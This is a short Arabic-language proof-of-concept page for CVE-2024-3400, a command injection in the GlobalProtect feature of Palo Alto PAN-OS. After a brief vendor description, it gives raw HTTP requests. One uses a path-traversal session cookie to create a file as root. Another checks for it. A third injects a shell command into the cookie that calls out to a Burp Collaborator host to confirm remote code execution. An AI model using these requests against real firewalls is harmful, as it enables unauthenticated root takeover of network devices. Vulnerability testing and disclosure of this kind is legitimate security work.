
CVE-2024-3400 PAN-OS: ثغرة حقن أوامر نظام التشغيل في GlobalProtect
CVE-2024-3400 حقن أوامر نظام التشغيل Palo Alto
وصف المُورِّد
ثغرة حقن أوامر في ميزة GlobalProtect من برنامج PAN-OS التابع لشركة Palo Alto Networks لإصدارات محددة من PAN-OS وتكوينات مميزة للميزات قد تمكن مهاجمًا غير مصادق من تنفيذ كود عشوائي بصلاحيات الجذر على جدار الحماية.
شكر وتقدير لـ watchtowr labs 🚀
طلب HTTP:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
يجب إنشاء poc.txt تحت هذا المسار /var/appweb/sslvpndocs/global-protect/portal/images/poc.tx بصلاحيات الجذر.
إذا كانت الثغرة موجودة، ستتلقى رمز 403 عند الوصول إلى poc.txt بدلاً من 404.
GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close
يجب تمكين القياس عن بُعد.
يمكنك استخدام Burp Collaborator للتحقق من RCE.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0